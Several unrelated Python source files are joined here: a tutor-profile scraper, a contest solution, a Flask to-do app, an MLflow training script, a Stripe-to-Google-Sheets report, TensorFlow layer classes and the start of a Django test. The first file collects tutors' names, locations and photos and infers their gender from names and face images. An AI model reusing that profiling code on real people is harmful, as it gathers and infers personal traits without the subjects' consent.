    """
    # Bug fix: the original used `~file.startswith('.')`, but `~` is
    # bitwise NOT (~True == -2, ~False == -1, both truthy), so hidden
    # files were never filtered out. `not` is the correct operator.
    files = set(file for file in os.listdir(html_path + language)
                if not file.startswith('.'))
    teachers = []
    # Read teachers lists (one JSON per retrieval date)
    list_files = set(file for file in os.listdir(list_path + language)
                     if not file.startswith('.'))
    lists = {}
    for l in list_files:
        lists[l.replace('.json', '')] = pd.read_json(os.path.join(list_path + language, l))
    for file in files:
        match = re.match(file_regex, file)
        pos = match.group(1)
        date = match.group(2)
        soup = generate_soup(os.path.join(html_path + language, file), pos, language, lists[date])
        if soup:
            info = crawl_teacher(pos, date, language, lists[date], soup)
            teachers.append(info)
    return pd.DataFrame(teachers)
def generate_soup(file_path: str,
                  position: int,
                  language: str,
                  prior_info: dict):
    # Parse a saved teacher HTML page into a BeautifulSoup tree.
    # NOTE(review): position, language and prior_info are unused, and the
    # function always returns a soup, so the caller's `if soup:` guard never
    # filters anything — confirm intent. Also note the open() file handle is
    # never explicitly closed here.
    soup = BeautifulSoup(open(file_path), "html.parser")
    return soup
def crawl_teacher(position: int,
                  date: int,
                  language: str,
                  prior_info: dict,
                  soup):
    """Extract one teacher's profile fields from a parsed profile page.

    Reads the apolloState JSON blob embedded in the page's scripts and
    pulls teacher/user details out of it. Each field is wrapped in its own
    try/except so that one missing datum degrades to the sentinel string
    'ERROR' instead of aborting the whole crawl.
    """
    info = {}
    info["language"] = language
    info["position"] = position
    info["retrieval_date"] = date
    # Whether this teacher was featured, taken from the listing crawled earlier
    info['is_featured'] = prior_info[prior_info['position'] == int(position)]['is_featured'].values[0]
    # Locate the inline script holding the apolloState JSON payload
    script = str([s for s in soup.find_all('script') if str(s).endswith('var isMobile = false;</script>')][0])
    json_details = json.loads(re.findall("var apolloState = (.*)", script)[0][:-1])
    teacher_key = [key for key in list(json_details.keys()) if key.startswith('Teacher')][0]
    user_key = [key for key in list(json_details.keys()) if key.startswith('User')][0]
    teacher_info = json_details[teacher_key]
    try:
        info["first_name"] = json_details[user_key]['first_name']
    except:
        info['first_name'] = 'ERROR'
    try:
        info["last_name"] = json_details[user_key]['last_name']
    except:
        info['last_name'] = 'ERROR'
    try:
        info["url"] = soup.findAll('link', {'rel': 'alternate'})[0].get('href')
    except:
        info['url'] = 'ERROR'
    try:
        # Older pages expose 'nationality'; fall back to 'country'
        if 'nationality' in teacher_info.keys():
            info['nationality'] = teacher_info['nationality']
        else:
            info['nationality'] = teacher_info['country']
    except:
        info['nationality'] = 'ERROR'
    try:
        info['location'] = json_details[user_key]['timezone']
    except:
        info['location'] = 'ERROR'
    try:
        info['avg_rating'] = teacher_info['avg_rating']
    except:
        info['avg_rating'] = 'ERROR'
    try:
        info['avg_lessons_per_students'] = teacher_info['avg_lessons_per_students']
    except:
        info['avg_lessons_per_students'] = 'ERROR'
    try:
        info['num_ratings'] = teacher_info['num_ratings']
    except:
        info['num_ratings'] = 'ERROR'
    try:
        info['teaching_levels'] = teacher_info['teaches_levels']['json']
    except:
        info['teaching_levels'] = 'ERROR'
    try:
        info['teaches'] = language
    except:
        info['teaches'] = 'ERROR'
    try:
        # Skill entries describe the classes/categories this teacher offers
        skill_keys = [key for key in list(json_details.keys()) if 'Skill' in key]
        class_details = []
        for key in skill_keys:
            class_details.append({'category': json_details[key]['category'], 'name': json_details[key]['name']})
        info['class_details'] = class_details
    except:
        info['class_details'] = "ERROR"
    try:
        # Languages the teacher speaks, with proficiency level, scraped
        # from the rendered HTML rather than the JSON blob
        langs = soup.findAll('span', {'class': 'ProfLanguage'})
        speaks = {}
        for s in langs:
            lang_code = re.findall("<span language=\"([\w]+)\"", str(s))[0]
            lang = re.findall("<span language=\"\w+\">([\w]+)<", str(s))[0]
            level = re.findall("<div class=.*>([\w]+)", str(s))[0]
            speaks[lang] = {'code': lang_code, 'level': level}
        info['speaks'] = speaks
    except:
        info['speaks'] = 'ERROR'
    try:
        info['lessons'] = json_details[teacher_info['user']['id']]['num_past_tutor_sessions_teacher']
    except:
        info['lessons'] = 'ERROR'
    try:
        info['students'] = json_details[teacher_key]['num_students']
    except:
        info['students'] = 'ERROR'
    try:
        # Price entries; price_cents is converted to whole currency units
        price_keys = [key for key in list(json_details.keys()) if 'prices' in key][:-1]
        prices = []
        for key in price_keys:
            num_lessons = json_details[key]['num_lessons']
            prices.append({'num_lessons': num_lessons, 'price': float(json_details[key]['price_cents'])/100})
        info['price_detail'] = prices
        info['price'] = prices[0]['price']/prices[0]['num_lessons']
    except:
        info['price'] = 'ERROR'
    try:
        dialect_key = [key for key in list(json_details.keys()) if 'AccentDialect' in key]
        if len(dialect_key):
            # NOTE(review): dialect_key is a *list* here, so this lookup always
            # raises and lands in the except branch — likely dialect_key[0]
            # was intended; confirm before fixing.
            info['dialect'] = json_details[dialect_key]['id']['name']
        else:
            info['dialect'] = 'Undefined'
    except:
        info['dialect'] = 'ERROR'
    info['price_currency'] = 'USD'
    try:
        info['avatar_url'] = json_details[user_key]['profile_pic_url']
    except:
        info['avatar_url'] = 'ERROR'
    return info
def main():
    """Crawl every language directory and write one dated teachers CSV per language."""
    list_path = os.path.join(DATA_PATH, "verbling/teachers_list/")
    html_path = os.path.join(DATA_PATH, "verbling/teachers_html/")
    output_path = os.path.join(DATA_PATH, "verbling/results/")
    # Bug fix: `~lang.startswith('.')` (bitwise NOT) is always truthy, so
    # hidden entries were never skipped; `not` is the correct operator.
    languages = set(lang for lang in os.listdir(list_path)
                    if not lang.startswith('.'))
    for language in languages:
        df = visit_language(list_path, html_path, language)
        df.to_csv(output_path + language + "/{}.csv".format(datetime.datetime.today().strftime('%Y%m%d')))
def infer_gender(df, column_name, prob_bound, img_url_col, images_path):
    """Infer gender from first names, falling back to profile images.

    Rows whose name-based probability is at or below *prob_bound* get their
    avatar image downloaded and classified; the image results are joined
    back onto the frame via the avatar URL.
    """
    df = infer_gender_name(df, column_name)
    # Rows where the name-based inference was not confident enough
    df_not_ready = df[df['gender_name_prob'] <= prob_bound]
    images = list(df_not_ready[img_url_col].unique())
    download_images(images, images_path, delete_folder=True)
    img_gender = infer_gender_image(images_path)
    img_gender = img_gender.rename(columns={'image': 'avatar_url'})
    img_gender = img_gender.set_index('avatar_url')
    # Transform df for join: strip the CDN prefix so URLs match image names
    df['avatar_url'] = df['avatar_url'].str.replace('https://res.cloudinary.com/verbling/image/fetch/c_fill,f_png,f_auto,g_face,h_150,w_150/', '')
    result = df.join(img_gender, on='avatar_url', how='left')
    return result
# Script entry point
if __name__ == "__main__":
    main()
import sys
from collections import defaultdict
# Allow deep recursion, typical for competitive-programming solutions
sys.setrecursionlimit(10 ** 6)
stdin = sys.stdin
INF = float('inf')
MOD = 10 ** 9 + 7
# Input helpers: ni() -> one int, na() -> list of ints, ns() -> stripped line
ni = lambda: int(ns())
na = lambda: list(map(int, stdin.readline().split()))
ns = lambda: stdin.readline().strip()
def modpow(a, b, m):
    """Return (a ** b) % m by binary exponentiation in O(log b) steps."""
    result = 1
    base, exp = a, b
    while exp:
        if exp & 1:
            result = result * base % m
        base = base * base % m
        exp >>= 1
    return result
# Read N (sequence length) and K (number of available values) from stdin
N, K = na()
if K == 1:
    # Only a length-1 sequence is possible with a single value
    if N == 1:
        print(1)
    else:
        print(0)
elif N == 1:
    print(K % MOD)
elif N == 2:
    print(K * (K - 1) % MOD)
else:
    # General case: K choices for the first element, K-1 for the second,
    # and K-2 for each remaining element, all modulo 1e9+7
    print((K * (K - 1) * modpow(K - 2, N - 2, MOD)) % MOD)
from flask import Blueprint, render_template, request, redirect
from . import db
bp = Blueprint("todos", __name__)
@bp.route("/", methods=('GET', 'POST'))
def index():
    """View for home page which shows list of to-do items."""
    cur = db.get_db().cursor()
    # Map the POSTed filter value to the matching query; anything else
    # (including plain GET requests) shows every item.
    queries = {
        'all': 'SELECT * FROM todos',
        'completed': 'SELECT * FROM todos WHERE completed=True',
        'uncompleted': 'SELECT * FROM todos WHERE completed=False',
    }
    query = 'SELECT * FROM todos'
    if request.method == 'POST':
        query = queries.get(request.form['filter'], query)
    cur.execute(query)
    todos = cur.fetchall()
    cur.close()
    return render_template("index.html", todos=todos)
@bp.route("/add", methods=["POST"])
def new_task():
    """Insert a new (uncompleted) to-do item, then return to the list."""
    task = request.form['task']
    with db.get_db() as con:
        with con.cursor() as cur:
            cur.execute("""INSERT INTO todos (description, completed, created_at)
            VALUES (%s, %s, NOW())""",
                        (task, False))
    return redirect("/")
@bp.route("/remove", methods=["POST"])
def remove():
    """Delete the to-do item whose id was submitted, then show the list.

    Bug fixes: the view previously returned None, which Flask rejects with
    a 500 error; it also re-executed the same DELETE once per submitted
    form field, and carried a redundant request.method check (the route
    only accepts POST).
    """
    with db.get_db() as con:
        with con.cursor() as cur:
            task_id = request.form.get("remove")
            cur.execute("DELETE FROM todos WHERE id = %s",
                        (task_id,))
            con.commit()
    return redirect("/")
@bp.route("/complete/<int:id>")
def complete(id):
    """Mark the given to-do item as completed, then show the list.

    Bug fix: returns a redirect; previously the view returned None, which
    Flask rejects with a 500 error.
    """
    with db.get_db() as con:
        with con.cursor() as cur:
            cur.execute("UPDATE todos SET completed = True WHERE id = %s", (id,))
            con.commit()
    return redirect("/")
@bp.route('/edit', methods=['GET', 'POST'])
def edit():
    """Update a to-do item's description from the edit form.

    Bug fix: always returns a redirect; previously a GET request fell
    through and returned None, producing a 500 error.
    """
    if request.method == 'POST':
        with db.get_db() as con:
            with con.cursor() as cur:
                editTask = request.form.get('editTask')
                id = request.form.get('edit')
                cur.execute(" UPDATE todos SET description = %s WHERE id = %s", (editTask, id,))
                con.commit()
    return redirect("/")
|
import os
from typing import Tuple
import mlflow
import mlflow.sklearn
import numpy as np
from skl2onnx import convert_sklearn
from skl2onnx.common.data_types import FloatTensorType
from sklearn.datasets import load_iris
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import StandardScaler
from sklearn.svm import OneClassSVM
def get_data() -> np.ndarray:
    """Load the iris feature matrix as a float32 ndarray.

    Bug fix: the return annotation previously said Tuple[np.ndarray]
    although a single array is returned.
    """
    iris = load_iris()
    data = iris.data
    data = np.array(data).astype("float32")
    return data
def define_ocs_pipeline() -> Pipeline:
    """Build the scaler + one-class SVM pipeline used for outlier detection."""
    return Pipeline(
        steps=[
            ("normalize", StandardScaler()),
            ("ocs", OneClassSVM(nu=0.1, gamma="auto")),
        ]
    )
def train(model, data):
    """Fit *model* on *data* in place (unsupervised; no labels needed)."""
    model.fit(data)
def evaluate(model, data) -> float:
    """Return the mean of the model's predictions over *data*.

    For a one-class SVM the predictions are +1 (inlier) / -1 (outlier),
    so the result equals 1 - 2 * (outlier fraction).
    """
    predictions = model.predict(data)
    return sum(predictions) / len(data)
def save_onnx(model, filepath: str):
    """Convert the fitted sklearn pipeline to ONNX and write it to *filepath*.

    The exported graph takes a single float32 input of shape (N, 4),
    matching the four iris features produced by get_data().
    """
    initial_type = [("float_input", FloatTensorType([None, 4]))]
    onx = convert_sklearn(model, initial_types=initial_type)
    with open(filepath, "wb") as f:
        f.write(onx.SerializeToString())
def main():
    """Train, evaluate and log the iris one-class SVM to MLflow.

    Logs params/metrics to the active MLflow run (MLflow starts one
    implicitly when logging outside ``start_run``) and attaches both the
    sklearn model and an ONNX export as artifacts.
    """
    # The experiment id is only used to name the ONNX artifact here.
    mlflow_experiment_id = int(os.getenv("MLFLOW_EXPERIMENT_ID", 0))
    data = get_data()
    model = define_ocs_pipeline()
    train(model, data)
    outlier_rate = evaluate(model, data)
    mlflow.log_param("normalize", "StandardScaler")
    mlflow.log_param("model", "one_class_svm")
    mlflow.log_metric("outlier_rate", outlier_rate)
    mlflow.sklearn.log_model(model, "model")
    onnx_name = f"iris_ocs_{mlflow_experiment_id}.onnx"
    onnx_path = os.path.join("/tmp/", onnx_name)
    save_onnx(model, onnx_path)
    mlflow.log_artifact(onnx_path)
# Script entry point: run the full train/evaluate/log flow.
if __name__ == "__main__":
    main()
|
import pandas as pd
import datetime
from datetime import datetime
from datetime import date
import petaldata
from petaldata.datasets.stripe.reports.abstract_stripe_report import AbstractStripeReport
from petaldata.datasets.stripe.reports.mtd_revenue import MTDRevenue
from petaldata.datasets.stripe.reports import query_filters
class Summary(AbstractStripeReport):
    """Summary report that pushes month-to-date revenue figures to a Google Sheet."""

    def __init__(self, invoices, tz='UTC', end_time=None):
        """
        :param invoices: invoice dataset forwarded to the base report
        :param tz: timezone name used for display timestamps
        :param end_time: report cutoff; defaults to "now" at call time.
            Bug fix: the previous default (``datetime.now().astimezone()``
            in the signature) was evaluated once at import time, freezing
            the cutoff for the life of the process.
        """
        if end_time is None:
            end_time = datetime.now().astimezone()
        super().__init__(invoices, tz=tz, end_time=end_time)
        self.mtd_report = MTDRevenue(invoices, tz=tz, end_time=end_time, fullRange=False)

    def to_frame(self):
        # Not implemented: this report writes directly to a spreadsheet.
        pass

    def to_gsheet(self, creds, spreadsheet_title=None, worksheet_title="Summary"):
        """Write the month-to-date summary cells into the named worksheet.

        The Google Sheet must be shared with the "client_email" from the
        JSON creds.
        """
        print("Opening Google Sheet...title=", spreadsheet_title)
        sh = self.gsheet_client(creds).open(spreadsheet_title)
        wks = self.find_or_create_wks(sh, worksheet_title)
        df_mtd = self.mtd_report.to_frame()
        print("\t...updating worksheet")
        # revenue: current vs previous month
        wks.cell('I6').value = df_mtd.amount_due_per_month.max()
        wks.cell('I7').value = df_mtd["amount_due_per_month (Previous Month)"].max()
        wks.cell('J6').value = df_mtd.amount_paid_per_month.max()
        wks.cell('J7').value = df_mtd["amount_paid_per_month (Previous Month)"].max()
        # customers: current vs previous month
        wks.cell('I11').value = df_mtd.customers.max()
        wks.cell('I12').value = df_mtd["customers (Previous Month)"].max()
        # record when the sheet was last refreshed
        wks.cell('I3').value = str(self.setup_time(datetime.now().astimezone(), tz=self.tz))
        print("\t...Done.")
|
# -*- coding: utf-8 -*-
"""
Defines mneflow.layers for mneflow.models.
@author: Ivan Zubarev, ivan.zubarev@aalto.fi
"""
#TODO: keras compatible layers
#TODO: pooling layer
#import functools
import tensorflow as tf
from tensorflow.keras.initializers import Constant
from tensorflow.keras.activations import relu
from tensorflow.keras import constraints as k_con, regularizers as k_reg
# import tensorflow.compat.v1 as tf
# tf.disable_v2_behavior()
import numpy as np
class BaseLayer(tf.keras.layers.Layer):
    """Common base for mneflow layers.

    Stores the layer size/nonlinearity and fills in default
    regularization/constraint settings in ``specs``. Subclasses are
    expected to set ``self.scope`` before using the helpers below.
    """
    def __init__(self, size, nonlin, specs, **args):
        super(BaseLayer, self).__init__(**args)
        self.size = size
        self.nonlin = nonlin
        self.specs = specs
        # Fill defaults so subclasses can index these keys unconditionally.
        # NOTE(review): setdefault mutates the caller's dict; subclasses pass
        # a shared mutable default `specs={}`, so settings can leak across
        # instances — consider copying the dict here.
        self.specs.setdefault("l1", 0.)
        self.specs.setdefault("l2", 0.)
        self.specs.setdefault("l1_scope", [])
        self.specs.setdefault("l2_scope", [])
        self.specs.setdefault("maxnorm_scope", [])

    def _set_regularizer(self):
        """Return an l1/l2 kernel regularizer if this layer's scope (or
        'weights') is listed in the corresponding specs scope list."""
        if self.scope in self.specs['l1_scope'] or 'weights' in self.specs['l1_scope']:
            reg = k_reg.l1(self.specs['l1'])
            print('Setting reg for {}, to l1'.format(self.scope))
        elif self.scope in self.specs['l2_scope'] or 'weights' in self.specs['l2_scope']:
            reg = k_reg.l2(self.specs['l2'])
            print('Setting reg for {}, to l2'.format(self.scope))
        else:
            reg = None
        return reg

    def _set_constraints(self):
        """Return a MaxNorm(2.) kernel constraint if this layer's scope is
        listed in specs['maxnorm_scope'], else None."""
        if self.scope in self.specs['maxnorm_scope']:
            constr = k_con.MaxNorm(2.)
            print('Setting constraint for {}, to MaxNorm'.format(self.scope))
        else:
            constr = None
        return constr
class Dense(BaseLayer, tf.keras.layers.Layer):
    """
    Fully-connected layer.

    Flattens any input with rank > 2, then applies nonlin(x @ w + b).
    """
    def __init__(self, scope="fc", size=None, nonlin=tf.identity, specs={},
                 **args):
        """
        :param scope: name scope used for ops and log messages
        :param size: number of output units
        :param nonlin: activation applied to the affine output
        :param specs: regularization/constraint settings (see BaseLayer)
        """
        self.scope = scope
        super(Dense, self).__init__(size=size, nonlin=nonlin, specs=specs,
                                    **args)
        self.constraint = self._set_constraints()
        self.reg = self._set_regularizer()

    def get_config(self):
        # Bug fix: previously called self.get_config() recursively, which
        # recursed until RecursionError. The base config must come from
        # super(), as the sibling layers do.
        config = super(Dense, self).get_config()
        config.update({'scope': self.scope, 'size': self.size,
                       'nonlin': self.nonlin})
        return config

    def build(self, input_shape):
        super(Dense, self).build(input_shape)
        # Collapse all non-batch dimensions into a single feature axis.
        self.flatsize = np.prod(input_shape[1:])
        self.w = self.add_weight(shape=[self.flatsize, self.size],
                                 initializer='he_uniform',
                                 regularizer=self.reg,
                                 constraint=self.constraint,
                                 trainable=True,
                                 name='fc_weights',
                                 dtype=tf.float32)
        self.b = self.add_weight(shape=[self.size],
                                 initializer=Constant(0.1),
                                 regularizer=None,
                                 trainable=True,
                                 name='fc_bias',
                                 dtype=tf.float32)
        print("Built: {} input: {}".format(self.scope, input_shape))

    def call(self, x, training=None):
        """Apply the dense layer to `x`, flattening it first if needed."""
        # The dead `while True:` wrapper was removed; the body always
        # returned on its first iteration.
        with tf.name_scope(self.scope):
            if len(x.shape) > 2:  # flatten if input is not a 2d array
                x = tf.reshape(x, [-1, self.flatsize])
            tmp = tf.matmul(x, self.w) + self.b
            return self.nonlin(tmp, name='out')
class DeMixing(BaseLayer):
    """
    Spatial demixing Layer.

    Learns a linear projection applied along `axis` of the input,
    followed by a bias and the configured nonlinearity.
    """
    def __init__(self, scope="dmx", size=None, nonlin=tf.identity, axis=-1,
                 specs={}, **args):
        # NOTE(review): `specs={}` is a shared mutable default that
        # BaseLayer mutates via setdefault — consider `specs=None` + copy.
        self.scope = scope
        self.axis = axis
        super(DeMixing, self).__init__(size=size, nonlin=nonlin, specs=specs,
                                       **args)

    def get_config(self):
        """Return the layer configuration for serialization."""
        config = super(DeMixing, self).get_config()
        config.update({'scope': self.scope, 'size': self.size,
                       'nonlin': self.nonlin, 'axis': self.axis})
        return config

    def build(self, input_shape):
        """Create the projection weights (len(axis dim) x size) and bias."""
        super(DeMixing, self).build(input_shape)
        self.constraint = self._set_constraints()
        self.reg = self._set_regularizer()
        self.w = self.add_weight(
            shape=(input_shape[self.axis], self.size),
            initializer='he_uniform',
            regularizer=self.reg,
            constraint = self.constraint,
            trainable=True,
            name='dmx_weights',
            dtype=tf.float32)
        self.b_in = self.add_weight(shape=([self.size]),
                                    initializer=Constant(0.1),
                                    regularizer=None,
                                    trainable=True,
                                    name='bias',
                                    dtype=tf.float32)
        print("Built: {} input: {}".format(self.scope, input_shape))

    #@tf.function
    def call(self, x, training=None):
        """Project `x` along `self.axis`, building lazily on first use."""
        while True:
            with tf.name_scope(self.scope):
                try:
                    demix = tf.tensordot(x, self.w, axes=[[self.axis], [0]],
                                         name='dmx')
                    demix = self.nonlin(demix + self.b_in)
                    #print(self.scope, ": output :", demix.shape)
                    return demix
                except(AttributeError):
                    # self.w does not exist yet: build from the runtime
                    # shape, then let the loop retry the projection.
                    input_shape = x.shape
                    self.build(input_shape)
                    #print(self.scope, 'building from call')
class LFTConv(BaseLayer):
    """
    Stackable temporal convolutional layer, interpretable (LF).

    Depthwise temporal convolution: one `filter_length`-tap filter per
    input channel, followed by bias and nonlinearity.
    """
    def __init__(self, scope="tconv", size=32, nonlin=tf.nn.relu,
                 filter_length=7, pooling=2, padding='SAME', specs={},
                 **args):
        # NOTE(review): `pooling` is accepted but never used here —
        # presumably pooling is delegated to TempPooling; confirm.
        self.scope = scope
        super(LFTConv, self).__init__(size=size, nonlin=nonlin, specs=specs,
                                      **args)
        self.size = size
        self.filter_length = filter_length
        self.padding = padding

    def get_config(self):
        """Return the layer configuration for serialization."""
        config = super(LFTConv, self).get_config()
        config.update({'scope': self.scope,
                       'filter_length': self.filter_length,
                       'nonlin': self.nonlin, 'padding': self.padding})
        return config

    def build(self, input_shape):
        """Create per-channel temporal filters (depth multiplier 1) and bias."""
        super(LFTConv, self).build(input_shape)
        self.constraint = self._set_constraints()
        self.reg = self._set_regularizer()
        shape = [1, self.filter_length, input_shape[-1], 1]
        self.filters = self.add_weight(shape=shape,
                                       initializer='he_uniform',
                                       regularizer=self.reg,
                                       constraint=self.constraint,
                                       trainable=True,
                                       name='tconv_weights',
                                       dtype=tf.float32)
        self.b = self.add_weight(shape=([input_shape[-1]]),
                                 initializer=Constant(0.1),
                                 regularizer=None,
                                 trainable=True,
                                 name='bias',
                                 dtype=tf.float32)
        print("Built: {} input: {}".format(self.scope, input_shape))

    #@tf.function
    def call(self, x, training=None):
        """Apply the depthwise temporal convolution, building lazily on first use."""
        while True:
            with tf.name_scope(self.scope):
                try:
                    conv = tf.nn.depthwise_conv2d(x,
                                                  self.filters,
                                                  padding=self.padding,
                                                  strides=[1, 1, 1, 1],
                                                  data_format='NHWC')
                    conv = self.nonlin(conv + self.b)
                    #print(self.scope, ": output :", conv.shape)
                    return conv
                except(AttributeError):
                    # Filters not created yet: build from the runtime shape,
                    # then let the loop retry the convolution.
                    input_shape = x.shape
                    self.build(input_shape)
class VARConv(BaseLayer):
    """
    Stackable temporal convolutional layer (full cross-channel filters).

    Unlike LFTConv's depthwise filters, this layer mixes all input
    channels into `size` output channels.
    """
    def __init__(self, scope="tconv", size=32, nonlin=tf.nn.relu,
                 filter_length=7, pooling=2, padding='SAME', specs={},
                 **args):
        # NOTE(review): `pooling` is accepted but never used here —
        # presumably pooling is delegated to TempPooling; confirm.
        self.scope = scope
        super(VARConv, self).__init__(size=size, nonlin=nonlin, specs=specs,
                                      **args)
        self.size = size
        self.filter_length = filter_length
        self.padding = padding

    def get_config(self):
        """Return the layer configuration for serialization."""
        config = super(VARConv, self).get_config()
        config.update({'scope': self.scope,
                       'filter_length': self.filter_length,
                       'nonlin': self.nonlin, 'padding': self.padding})
        return config

    def build(self, input_shape):
        print("input_shape:", input_shape)
        super(VARConv, self).build(input_shape)
        self.constraint = self._set_constraints()
        self.reg = self._set_regularizer()
        shape = [1, self.filter_length, input_shape[-1], self.size]
        self.filters = self.add_weight(shape=shape,
                                       initializer='he_uniform',
                                       regularizer=self.reg,
                                       constraint=self.constraint,
                                       trainable=True,
                                       name='tconv_weights',
                                       dtype=tf.float32)
        # Bug fix: conv2d output has self.size channels, so the bias must be
        # [self.size]; the previous [input_shape[-1]] only broadcast when
        # size happened to equal the input channel count.
        self.b = self.add_weight(shape=([self.size]),
                                 initializer=Constant(0.1),
                                 regularizer=None,
                                 trainable=True,
                                 name='bias',
                                 dtype=tf.float32)
        print("Built: {} input: {}".format(self.scope, input_shape))

    #@tf.function
    def call(self, x, training=None):
        """Apply the convolution, building lazily on first use."""
        while True:
            with tf.name_scope(self.scope):
                try:
                    conv = tf.nn.conv2d(x, self.filters,
                                        padding=self.padding,
                                        strides=[1, 1, 1, 1],
                                        data_format='NHWC')
                    # Bug fix: bias + nonlinearity were previously applied
                    # twice in a row (duplicated line).
                    conv = self.nonlin(conv + self.b)
                    return conv
                except(AttributeError):
                    # Filters not created yet: build from the runtime shape,
                    # then let the loop retry the convolution.
                    input_shape = x.shape
                    self.build(input_shape)
class TempPooling(BaseLayer):
    """Temporal pooling (max or average) over the time axis of NHWC input."""
    def __init__(self, scope="pool", stride=2, pooling=2, specs={},
                 padding='SAME', pool_type='max', **args):
        """
        :param stride: stride along the time (W) axis
        :param pooling: pooling window length along the time (W) axis
        :param pool_type: 'avg' for average pooling, anything else pools max
        """
        self.scope = '_'.join([pool_type, scope])
        super(TempPooling, self).__init__(size=None, nonlin=None, specs=specs,
                                          **args)
        # Bug fix: keep the raw `pooling` argument; get_config() referenced
        # self.pooling, which was never stored and raised AttributeError.
        self.pooling = pooling
        self.strides = [1, 1, stride, 1]
        self.kernel = [1, 1, pooling, 1]
        self.padding = padding
        self.pool_type = pool_type

    #@tf.function
    def call(self, x):
        """Pool `x` with the configured window/stride."""
        if self.pool_type == 'avg':
            pooled = tf.nn.avg_pool2d(
                x,
                ksize=self.kernel,
                strides=self.strides,
                padding=self.padding,
                data_format='NHWC')
        else:
            pooled = tf.nn.max_pool2d(
                x,
                ksize=self.kernel,
                strides=self.strides,
                padding=self.padding,
                data_format='NHWC')
        return pooled

    def build(self, input_shape):
        # No weights to create; just mark the layer as built.
        super(TempPooling, self).build(input_shape)
        self.built = True

    def get_config(self):
        config = super(TempPooling, self).get_config()
        # NOTE(review): 'stride' serializes the expanded [1, 1, stride, 1]
        # list rather than the scalar constructor argument — kept as-is for
        # compatibility with existing saved configs.
        config.update({'scope': self.scope,
                       'pool_type': self.pool_type,
                       'stride': self.strides, 'pooling': self.pooling,
                       'padding': self.padding})
        return config
#def compose(f, g):
# return lambda *a, **kw: f(g(*a, **kw))
#
#
#def stack_layers(*args):
# return functools.partial(functools.reduce, compose)(*args)
#
#
#def vgg_block(n_layers, layer, kwargs):
# layers = []
# for i in range(n_layers):
# if i > 0:
# kwargs['inch'] = kwargs['n_ls']
# layers.append(layer(**kwargs))
# layers.append(tf.layers.batch_normalization)
# layers.append(tf.nn.max_pool)
# return stack_layers(layers[::-1])
#def weight_variable(shape, name='', method='he'):
# """Initialize weight variable."""
# if method == 'xavier':
# xavf = 2./sum(np.prod(shape[:-1]))
# initial = xavf*tf.random_uniform(shape, minval=-.5, maxval=.5)
#
# elif method == 'he':
# hef = np.sqrt(6. / np.prod(shape[:-1]))
# initial = hef*tf.random_uniform(shape, minval=-1., maxval=1.)
#
# else:
# initial = tf.truncated_normal(shape, stddev=.1)
#
# return tf.Variable(initial, trainable=True, name=name+'weights')
#
#
#def bias_variable(shape):
# """Initialize bias variable as constant 0.1."""
# initial = tf.constant(0.1, shape=shape)
# return tf.Variable(initial, trainable=True, name='bias')
#
#
#def spatial_dropout(x, rate, seed=1234):
# num_feature_maps = [tf.shape(x)[0], tf.shape(x)[3]]
# random_tensor = 1 - rate
# random_tensor = random_tensor + tf.random_uniform(num_feature_maps,
# seed=seed,
# dtype=x.dtype)
# binary_tensor = tf.floor(random_tensor)
# binary_tensor = tf.reshape(binary_tensor, [-1, 1, 1, tf.shape(x)[3]])
# ret = tf.div(x, (1 - rate)) * binary_tensor
# return ret
#class DeMixing():
# """Reduce dimensions across one domain."""
# def __init__(self, scope="de-mix", n_ls=32, nonlin=tf.identity, axis=3):
# self.scope = scope
# self.size = n_ls
# self.nonlin = nonlin
# self.axis = axis
#
# def __call__(self, x):
# with tf.name_scope(self.scope):
# while True:
# # reuse weights if already initialized
# try:
# x_reduced = self.nonlin(
# tf.tensordot(x, self.W, axes=[[self.axis], [0]],
# name='de-mix')
# + self.b_in)
# print('dmx', x_reduced.shape)
# return x_reduced
# except(AttributeError):
# self.W = weight_variable(
# (x.shape[self.axis].value, self.size), name='dmx_')
# self.b_in = bias_variable([self.size])
# print(self.scope, 'init : OK')
#class ConvDSV():
# """Standard/Depthwise/Spearable Convolutional Layer constructor."""
#
# def __init__(self, scope="conv", n_ls=None, nonlin=None, inch=None,
# domain=None, padding='SAME', filter_length=5, stride=1,
# pooling=2, dropout=.5, conv_type='depthwise'):
#
# self.scope = '-'.join([conv_type, scope, domain])
# self.padding = padding
# self.domain = domain
# self.inch = inch
# self.dropout = dropout
# self.size = n_ls
# self.filter_length = filter_length
# self.stride = stride
# self.nonlin = nonlin
# self.conv_type = conv_type
#
# def __call__(self, x):
# """Calculate the graph for input `X`.
#
# Raises:
# -------
# ValueError: If the convolution/domain arguments do not have
# the supported values.
# """
# with tf.name_scope(self.scope):
# while True:
# try:
# if self.conv_type == 'depthwise':
# conv_ = tf.nn.depthwise_conv2d(
# x,
# self.filters,
# strides=[1, self.stride, 1, 1],
# padding=self.padding)
#
# elif self.conv_type == 'separable':
# conv_ = tf.nn.separable_conv2d(
# x,
# self.filters,
# self.pwf,
# strides=[1, self.stride, 1, 1],
# padding=self.padding)
#
# elif self.conv_type == '2d':
# conv_ = tf.nn.conv2d(
# x,
# self.filters,
# strides=[1, self.stride, self.stride, 1],
# padding=self.padding)
# else:
# raise ValueError('Invalid convolution type.')
#
# conv_ = self.nonlin(conv_ + self.b)
#
# return conv_
#
# except(AttributeError):
# if self.domain == 'time':
# w_sh = [1, self.filter_length, self.inch, self.size]
#
# elif self.domain == 'space':
# w_sh = [self.filter_length, 1, self.inch, self.size]
#
# elif self.domain == '2d':
# w_sh = [self.filter_length[0], self.filter_length[1],
# self.inch, self.size]
# else:
# raise ValueError('Invalid domain.')
#
# self.filters = weight_variable(w_sh, name='weights')
# self.b = bias_variable([self.size])
#
# if self.conv_type == 'separable':
# self.pwf = weight_variable(
# [1, 1, self.inch*self.size, self.size],
# name='sep-pwf')
#
# print(self.scope, 'init : OK')
|
# coding=utf-8
import pytest
from mock import patch
from django.utils import timezone
from django.test import TestCase, RequestFactory
from molo.core.models import (
Main, SiteLanguageRelation, Languages, BannerPage,
SiteSettings, ArticleOrderingChoices, LanguageRelation,
FormPage, FormIndexPage
)
from molo.core.tests.base import MoloTestCaseMixin
from molo.core.templatetags.core_tags import (
get_parent, bannerpages, get_recommended_articles,
hero_article, render_translations, load_descendant_articles_for_section,
load_child_articles_for_section,
load_sections, latest_form_listing
)
@pytest.mark.django_db
class TestModels(TestCase, MoloTestCaseMixin):
    """Tests for molo.core template tags: banners, parents, article ordering,
    recommendations, hero articles and section loading."""

    def setUp(self):
        """Create a main site, en/fr languages, nested sections and a request."""
        self.mk_main()
        self.main = Main.objects.all().first()
        self.factory = RequestFactory()
        self.language_setting = Languages.objects.create(
            site_id=self.main.get_site().pk)
